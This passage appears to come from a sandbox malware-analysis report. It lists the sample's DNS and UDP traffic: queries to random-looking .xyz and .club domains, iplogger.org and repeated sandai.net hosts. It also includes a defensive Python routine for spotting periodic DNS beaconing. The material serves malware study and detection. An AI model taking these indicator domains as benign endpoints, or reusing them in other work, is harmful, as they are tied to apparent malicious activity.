                                                                                                                                                  Dec 5, 2020 08:45:03.666244030 CET6090553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.701962948 CET53609058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.736870050 CET6277653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.764144897 CET53627768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.883415937 CET5692353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.919194937 CET53569238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:04.267421007 CET6520153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:04.294631958 CET53652018.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:04.783400059 CET5426453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:04.810632944 CET53542648.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:05.330240965 CET5843953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:05.357727051 CET53584398.8.8.8192.168.2.3
Dec 5, 2020 08:45:05.877887964 CET | 54235 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:05.905102015 CET | 53 | 54235 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:06.407953024 CET | 55876 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:06.435257912 CET | 53 | 55876 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:06.940469980 CET | 56994 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:06.967833042 CET | 53 | 56994 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:07.470385075 CET | 58832 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:07.497612953 CET | 53 | 58832 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:07.985903025 CET | 51800 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:08.013257027 CET | 53 | 51800 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:08.503778934 CET | 58836 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:08.530966997 CET | 53 | 58836 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:09.033617020 CET | 64669 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:09.060971022 CET | 53 | 64669 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:09.566113949 CET | 64735 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:09.593342066 CET | 53 | 64735 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:10.112205029 CET | 52472 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:10.139463902 CET | 53 | 52472 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:10.626859903 CET | 51697 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:10.654100895 CET | 53 | 51697 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:11.142332077 CET | 63020 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:11.169487953 CET | 53 | 63020 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:11.676170111 CET | 59853 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:11.703306913 CET | 53 | 59853 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:12.206394911 CET | 62196 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:12.233783007 CET | 53 | 62196 | 8.8.8.8 | 192.168.2.3
Dec 5, 2020 08:45:12.737648010 CET | 50700 | 53 | 192.168.2.3 | 8.8.8.8
Dec 5, 2020 08:45:12.765013933 CET | 53 | 50700 | 8.8.8.8 | 192.168.2.3
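The UDP rows above are the sample's DNS round trips to 8.8.8.8 late in the run: one query roughly every half second, each answered in about 27 ms. The following Python routine is an added example, not part of the Joe Sandbox report; it takes rows in the table's column order (timestamp, source port, dest port, source IP, dest IP), pairs each query with its reply through the client's ephemeral port, and measures reply latency and query cadence so that a timer-driven lookup pattern can be told apart from interactive traffic. The resolver address, the six sample pairs copied from the table, and the 10 % coefficient-of-variation threshold are assumptions chosen for the example.

```python
import re
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: the first six query/reply pairs copied from the UDP packet
# table, as (timestamp, source port, dest port, source IP, dest IP).
SAMPLE_ROWS = [
    ("Dec 5, 2020 08:45:05.877887964 CET", 54235, 53, "192.168.2.3", "8.8.8.8"),
    ("Dec 5, 2020 08:45:05.905102015 CET", 53, 54235, "8.8.8.8", "192.168.2.3"),
    ("Dec 5, 2020 08:45:06.407953024 CET", 55876, 53, "192.168.2.3", "8.8.8.8"),
    ("Dec 5, 2020 08:45:06.435257912 CET", 53, 55876, "8.8.8.8", "192.168.2.3"),
    ("Dec 5, 2020 08:45:06.940469980 CET", 56994, 53, "192.168.2.3", "8.8.8.8"),
    ("Dec 5, 2020 08:45:06.967833042 CET", 53, 56994, "8.8.8.8", "192.168.2.3"),
    ("Dec 5, 2020 08:45:07.470385075 CET", 58832, 53, "192.168.2.3", "8.8.8.8"),
    ("Dec 5, 2020 08:45:07.497612953 CET", 53, 58832, "8.8.8.8", "192.168.2.3"),
    ("Dec 5, 2020 08:45:07.985903025 CET", 51800, 53, "192.168.2.3", "8.8.8.8"),
    ("Dec 5, 2020 08:45:08.013257027 CET", 53, 51800, "8.8.8.8", "192.168.2.3"),
    ("Dec 5, 2020 08:45:08.503778934 CET", 58836, 53, "192.168.2.3", "8.8.8.8"),
    ("Dec 5, 2020 08:45:08.530966997 CET", 53, 58836, "8.8.8.8", "192.168.2.3"),
]

_TS = re.compile(r"^(?P<date>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) \w+$")


def parse_ts(text):
    """Parse the report's 'Mon D, YYYY HH:MM:SS.nnnnnnnnn TZ' stamp into a naive datetime.
    The nanosecond fraction is truncated to microseconds (datetime's resolution) and the
    zone label is dropped; only differences between stamps are used, so neither matters."""
    m = _TS.match(text)
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    frac = m.group("frac")[:6].ljust(6, "0")
    return datetime.strptime(f"{m.group('date')}.{frac}", "%b %d, %Y %H:%M:%S.%f")


def pair_dns_transactions(rows, resolver="8.8.8.8"):
    """Match each UDP/53 query to the resolver with the reply that returns to the same
    ephemeral client port. Returns (query_time, latency_seconds) per matched pair in
    query order; unanswered queries are left out."""
    pending = {}  # client port -> time the query was sent
    pairs = []
    for ts, sport, dport, src, dst in rows:
        t = parse_ts(ts)
        if dport == 53 and dst == resolver:
            pending[sport] = t
        elif sport == 53 and src == resolver and dport in pending:
            q = pending.pop(dport)
            pairs.append((q, (t - q).total_seconds()))
    return pairs


def cadence(times):
    """Mean inter-query interval and its coefficient of variation (pstdev / mean).
    A low CV over many events means the client queries on a fixed timer rather than on
    user activity. Returns (None, None) for fewer than three events."""
    if len(times) < 3:
        return None, None
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    m = mean(gaps)
    return m, pstdev(gaps) / m


def analyse(rows, min_events=5, max_cv=0.1):
    """Summarise the resolver traffic; 'periodic' is the beaconing verdict (assumed thresholds)."""
    pairs = pair_dns_transactions(rows)
    times = [q for q, _ in pairs]
    interval, cv = cadence(times)
    return {
        "transactions": len(pairs),
        "mean_latency_s": mean(lat for _, lat in pairs) if pairs else None,
        "mean_interval_s": interval,
        "interval_cv": cv,
        "periodic": cv is not None and len(times) >= min_events and cv < max_cv,
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_ROWS))
```

On the six sample pairs the mean interval comes out near 0.525 s with a coefficient of variation around 1 %, which is what a sleep-loop lookup looks like; human-driven browsing produces gaps that vary by far more than that. Pairing on the ephemeral port rather than on order alone also keeps the latency figure honest when a reply is lost or arrives out of sequence.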

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 5, 2020 08:43:49.899223089 CET | 192.168.2.3 | 8.8.8.8 | d02d | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 5, 2020 08:41:53.342662096 CET | 192.168.2.3 | 8.8.8.8 | 0x92a9 | Standard query (0) | ef6df4af06ba6896.xyz | A (IP address) | IN (0x0001)
Dec 5, 2020 08:42:48.059262991 CET | 192.168.2.3 | 8.8.8.8 | 0xbe88 | Standard query (0) | ef6df4af06ba6896.xyz | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:12.375412941 CET | 192.168.2.3 | 8.8.8.8 | 0x2421 | Standard query (0) | 1c5491a87d65f1ef.club | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:28.374576092 CET | 192.168.2.3 | 8.8.8.8 | 0xf72f | Standard query (0) | ef6df4af06ba6896.xyz | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:33.014781952 CET | 192.168.2.3 | 8.8.8.8 | 0x34d3 | Standard query (0) | ef6df4af06ba6896.xyz | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:43.564450026 CET | 192.168.2.3 | 8.8.8.8 | 0xdb46 | Standard query (0) | EF6DF4AF06BA6896.xyz | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.052850008 CET | 192.168.2.3 | 8.8.8.8 | 0x79fc | Standard query (0) | hub5pnc.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.052906036 CET | 192.168.2.3 | 8.8.8.8 | 0x6bfc | Standard query (0) | hub5pn.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.448940039 CET | 192.168.2.3 | 8.8.8.8 | 0x600a | Standard query (0) | hub5u.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.488394976 CET | 192.168.2.3 | 8.8.8.8 | 0x7c0 | Standard query (0) | hub5c.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.492825985 CET | 192.168.2.3 | 8.8.8.8 | 0x7c1 | Standard query (0) | pmap.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.497859001 CET | 192.168.2.3 | 8.8.8.8 | 0x7c2 | Standard query (0) | dream.pics | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.503201962 CET | 192.168.2.3 | 8.8.8.8 | 0x7c3 | Standard query (0) | hub5idx.shub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.507247925 CET | 192.168.2.3 | 8.8.8.8 | 0x7c4 | Standard query (0) | hubstat.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.886359930 CET | 192.168.2.3 | 8.8.8.8 | 0xf80f | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.924384117 CET | 192.168.2.3 | 8.8.8.8 | 0x6951 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:47.464710951 CET | 192.168.2.3 | 8.8.8.8 | 0xe8e2 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.010875940 CET | 192.168.2.3 | 8.8.8.8 | 0x1a3a | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.114943027 CET | 192.168.2.3 | 8.8.8.8 | 0x7c5 | Standard query (0) | hub5sr.shub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.118016005 CET | 192.168.2.3 | 8.8.8.8 | 0x7c6 | Standard query (0) | hub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.121144056 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.124800920 CET | 192.168.2.3 | 8.8.8.8 | 0x7c8 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.469470978 CET | 192.168.2.3 | 8.8.8.8 | 0x7c8 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.470809937 CET | 192.168.2.3 | 8.8.8.8 | 0xfb24 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.506843090 CET | 192.168.2.3 | 8.8.8.8 | 0x7c8 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.508157969 CET | 192.168.2.3 | 8.8.8.8 | 0xeaf4 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.541522980 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.542855978 CET | 192.168.2.3 | 8.8.8.8 | 0x5596 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.557689905 CET | 192.168.2.3 | 8.8.8.8 | 0x7b6a | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.578788042 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.580691099 CET | 192.168.2.3 | 8.8.8.8 | 0x88b9 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.616544008 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.617836952 CET | 192.168.2.3 | 8.8.8.8 | 0xe1d0 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.654639006 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.656128883 CET | 192.168.2.3 | 8.8.8.8 | 0x6fb | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.692184925 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.693607092 CET | 192.168.2.3 | 8.8.8.8 | 0x621f | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.105391026 CET | 192.168.2.3 | 8.8.8.8 | 0xfec2 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.510230064 CET | 192.168.2.3 | 8.8.8.8 | 0xeaf4 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.546184063 CET | 192.168.2.3 | 8.8.8.8 | 0x7c8 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.547491074 CET | 192.168.2.3 | 8.8.8.8 | 0x20db | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.651437044 CET | 192.168.2.3 | 8.8.8.8 | 0xb67 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.932180882 CET | 192.168.2.3 | 8.8.8.8 | 0x7c8 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.933799028 CET | 192.168.2.3 | 8.8.8.8 | 0xe49b | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.971388102 CET | 192.168.2.3 | 8.8.8.8 | 0x7c8 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.973582029 CET | 192.168.2.3 | 8.8.8.8 | 0x709a | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:50.183084011 CET | 192.168.2.3 | 8.8.8.8 | 0xd672 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:50.730550051 CET | 192.168.2.3 | 8.8.8.8 | 0x7fcd | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:51.276849031 CET | 192.168.2.3 | 8.8.8.8 | 0x2599 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:51.823340893 CET | 192.168.2.3 | 8.8.8.8 | 0x1faf | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:52.408591986 CET | 192.168.2.3 | 8.8.8.8 | 0x7d31 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:52.955682993 CET | 192.168.2.3 | 8.8.8.8 | 0x3923 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:56.625580072 CET | 192.168.2.3 | 8.8.8.8 | 0x7a6d | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:57.236421108 CET | 192.168.2.3 | 8.8.8.8 | 0xd060 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.803669930 CET | 192.168.2.3 | 8.8.8.8 | 0x27c6 | Standard query (0) | hub5pnc.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.804709911 CET | 192.168.2.3 | 8.8.8.8 | 0x49b7 | Standard query (0) | hub5pn.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.846127987 CET | 192.168.2.3 | 8.8.8.8 | 0xceb2 | Standard query (0) | hub5u.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.857948065 CET | 192.168.2.3 | 8.8.8.8 | 0x7c0 | Standard query (0) | hub5c.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.864092112 CET | 192.168.2.3 | 8.8.8.8 | 0x7c1 | Standard query (0) | pmap.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.870414019 CET | 192.168.2.3 | 8.8.8.8 | 0x7c2 | Standard query (0) | www.sodown.xyz | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.875919104 CET | 192.168.2.3 | 8.8.8.8 | 0x7c3 | Standard query (0) | hub5idx.shub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.884202003 CET | 192.168.2.3 | 8.8.8.8 | 0x8e07 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.885776997 CET | 192.168.2.3 | 8.8.8.8 | 0x7c4 | Standard query (0) | hubstat.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:58.921621084 CET | 192.168.2.3 | 8.8.8.8 | 0x1789 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:59.448873997 CET | 192.168.2.3 | 8.8.8.8 | 0x3d74 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:59.980581999 CET | 192.168.2.3 | 8.8.8.8 | 0xdf01 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:00.497203112 CET | 192.168.2.3 | 8.8.8.8 | 0xbe4b | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.016016006 CET | 192.168.2.3 | 8.8.8.8 | 0x841d | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.558756113 CET | 192.168.2.3 | 8.8.8.8 | 0xf3db | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.765913963 CET | 192.168.2.3 | 8.8.8.8 | 0x7c5 | Standard query (0) | hub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.769349098 CET | 192.168.2.3 | 8.8.8.8 | 0x7c6 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.771750927 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.805136919 CET | 192.168.2.3 | 8.8.8.8 | 0x7c6 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.806685925 CET | 192.168.2.3 | 8.8.8.8 | 0x7007 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.807689905 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.810213089 CET | 192.168.2.3 | 8.8.8.8 | 0xaafd | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.847259045 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.848738909 CET | 192.168.2.3 | 8.8.8.8 | 0x297b | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.885165930 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.886617899 CET | 192.168.2.3 | 8.8.8.8 | 0xbbba | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.922816038 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.923988104 CET | 192.168.2.3 | 8.8.8.8 | 0x9cd7 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.959923029 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:01.961081028 CET | 192.168.2.3 | 8.8.8.8 | 0x95a8 | Standard query (0) | score.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.075781107 CET | 192.168.2.3 | 8.8.8.8 | 0x112d | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.258651018 CET | 192.168.2.3 | 8.8.8.8 | 0x7c6 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.260009050 CET | 192.168.2.3 | 8.8.8.8 | 0x4483 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.296370983 CET | 192.168.2.3 | 8.8.8.8 | 0x7c6 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.297508955 CET | 192.168.2.3 | 8.8.8.8 | 0x527 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.333282948 CET | 192.168.2.3 | 8.8.8.8 | 0x7c6 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.334471941 CET | 192.168.2.3 | 8.8.8.8 | 0xac55 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.371311903 CET | 192.168.2.3 | 8.8.8.8 | 0x7c6 | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.373500109 CET | 192.168.2.3 | 8.8.8.8 | 0x3d9b | Standard query (0) | imhub5pr.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:02.606443882 CET | 192.168.2.3 | 8.8.8.8 | 0xcc35 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:03.137140989 CET | 192.168.2.3 | 8.8.8.8 | 0x833d | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:03.686932087 CET | 192.168.2.3 | 8.8.8.8 | 0x75f8 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:04.230811119 CET | 192.168.2.3 | 8.8.8.8 | 0xdb3c | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:04.763760090 CET | 192.168.2.3 | 8.8.8.8 | 0xd7ec | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:05.314198017 CET | 192.168.2.3 | 8.8.8.8 | 0x4d11 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:05.840318918 CET | 192.168.2.3 | 8.8.8.8 | 0xfc5c | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:06.373202085 CET | 192.168.2.3 | 8.8.8.8 | 0x9a51 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:06.904190063 CET | 192.168.2.3 | 8.8.8.8 | 0x5ca0 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:07.454602003 CET | 192.168.2.3 | 8.8.8.8 | 0x7e7f | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:07.996587992 CET | 192.168.2.3 | 8.8.8.8 | 0x30c1 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:08.543495893 CET | 192.168.2.3 | 8.8.8.8 | 0xe50b | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:09.090739965 CET | 192.168.2.3 | 8.8.8.8 | 0x44d1 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:09.623686075 CET | 192.168.2.3 | 8.8.8.8 | 0xef1 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:10.154020071 CET | 192.168.2.3 | 8.8.8.8 | 0xd095 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:10.701011896 CET | 192.168.2.3 | 8.8.8.8 | 0x7ed4 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:11.232388973 CET | 192.168.2.3 | 8.8.8.8 | 0xa443 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.779169083 CET192.168.2.38.8.8.80xbcd9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:12.556914091 CET192.168.2.38.8.8.80xe663Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:13.165429115 CET192.168.2.38.8.8.80x711dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.356935978 CET192.168.2.38.8.8.80x2267Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.888703108 CET192.168.2.38.8.8.80x9788Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:15.421914101 CET192.168.2.38.8.8.80xdcafStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:15.970869064 CET192.168.2.38.8.8.80x122fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:16.517447948 CET192.168.2.38.8.8.80x8a7fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.044955015 CET192.168.2.38.8.8.80xd65dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.575695992 CET192.168.2.38.8.8.80x1808Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.123766899 CET192.168.2.38.8.8.80x905fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
